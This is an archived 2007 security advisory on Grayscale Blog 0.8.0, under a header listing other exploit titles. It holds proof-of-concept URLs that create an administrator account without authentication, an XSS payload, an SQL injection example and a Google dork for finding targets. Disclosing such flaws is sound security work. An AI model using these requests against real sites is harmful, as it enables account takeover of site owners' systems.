
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
89 lines
3.1 KiB
Text
Executable file
89 lines
3.1 KiB
Text
Executable file
# Security Advisory - Multiple Vulnerabilities in Grayscale Blog 0.8.0 #
|
|
|
|
Date : 2007-02-24
|
|
Product : Grayscale Blog
|
|
Version : 0.8.0 - Prior version maybe also be affected
|
|
Vendor : http://sourceforge.net/projects/gsblogger/ - http://www.karlcore.com/programming/blog/
|
|
|
|
Vendor Status : 2007-02-24 -> Not Informed!
|
|
2007-03-02 -> Contacted, waiting reply!
|
|
2007-03-09 -> Vendor never replyed
|
|
|
|
Source : omnipresent - omni
|
|
E-mail : omnipresent[at]email[dot]it
|
|
|
|
Google Dork : "Powered by Grayscale Blog"
|
|
|
|
|
|
Security Issues :
|
|
|
|
1.) Security Query Bypass: [TESTED]
|
|
|
|
A user can do lots of stuff with some php scripts located in the directory "/scripts/", for example:
|
|
|
|
add_user.php - Security Bypass
|
|
|
|
// $user_id=$_REQUEST['user_id']; // not used
|
|
$user_loginname=$_REQUEST['user_loginname'];
|
|
$user_password=$_REQUEST['user_password'];
|
|
$user_real_name=$_REQUEST['user_real_name'];
|
|
$user_email=$_REQUEST['user_email'];
|
|
// $user_date_added=$_REQUEST['user_date_added']; // not used
|
|
// $user_lastmod=$_REQUEST['user_lastmod']; // not used
|
|
$user_permissions=$_REQUEST['user_permissions'];
|
|
$user_added_by=$_REQUEST['user_added_by'];
|
|
$user_lastmod_by=$_REQUEST['user_lastmod_by'];
|
|
$user_allow=$_REQUEST['user_allow'];
|
|
|
|
// define the query
|
|
$query = "INSERT INTO blog_users (user_loginname, user_password, user_real_name, user_email, user_date_added, user_lastmod, user_permissions, user_added_by, user_lastmod_by, user_allow )
|
|
values ('$user_loginname', '$user_password', '$user_real_name', '$user_email', NOW(), NOW(), '$user_permissions', '$user_added_by', '$user_lastmod_by', '$user_allow')";
|
|
|
|
As you can see the code there are no security restriction for any users!! Everyone can add a user with Administrator Privilege ($user_permissions = 3).
|
|
|
|
Other files affected by some security issues, like the above, are:
|
|
|
|
-addblog.php
|
|
-editblog.php
|
|
-editlinks.php
|
|
-edit_users.php
|
|
-add_links.php
|
|
|
|
Example:
|
|
|
|
http://vulnerable_server/path/scripts/add_users.php?user_loginname=HACK_USER&user_password=HACK_USER&user_real_name=real&user_email=os@so.net&user_permissions=3&user_added_by=1&user_lastmod_by=1&user_allow=1
|
|
|
|
And you have admin rights!
|
|
|
|
2.) XSS Vulnerability: [TESTED]
|
|
|
|
Security issue in the following files:
|
|
|
|
-"/scripts/addblog_comment.php" -> variables are not properly sanitized before being used in the query string
|
|
-"detail.php" -> variables are not properly sanitized before being used in the query string (query2 -> blog_comments)
|
|
|
|
Example:
|
|
|
|
You can put in the comment fields the following script:
|
|
|
|
<script>alert("XSS")</script>
|
|
|
|
|
|
3.) SQL Injection vulnerability: [NOT TESTED]
|
|
|
|
In lots of files variables are not properly sanitized before being used, these files are, for example:
|
|
|
|
-userdetail.php -> id variable
|
|
-jump.php -> id variable and url variable for our redirect
|
|
-detail.php -> id variable
|
|
|
|
Example:
|
|
|
|
http://vulnerable_server/path/detail.php?id=1;[SQL INJECTION]
|
|
|
|
.:. Patches:
|
|
|
|
0x0 No vendor patches released!
|
|
0x1 Edit the source code to ensure that input is properly verified.
|
|
|
|
# milw0rm.com [2007-03-09]
|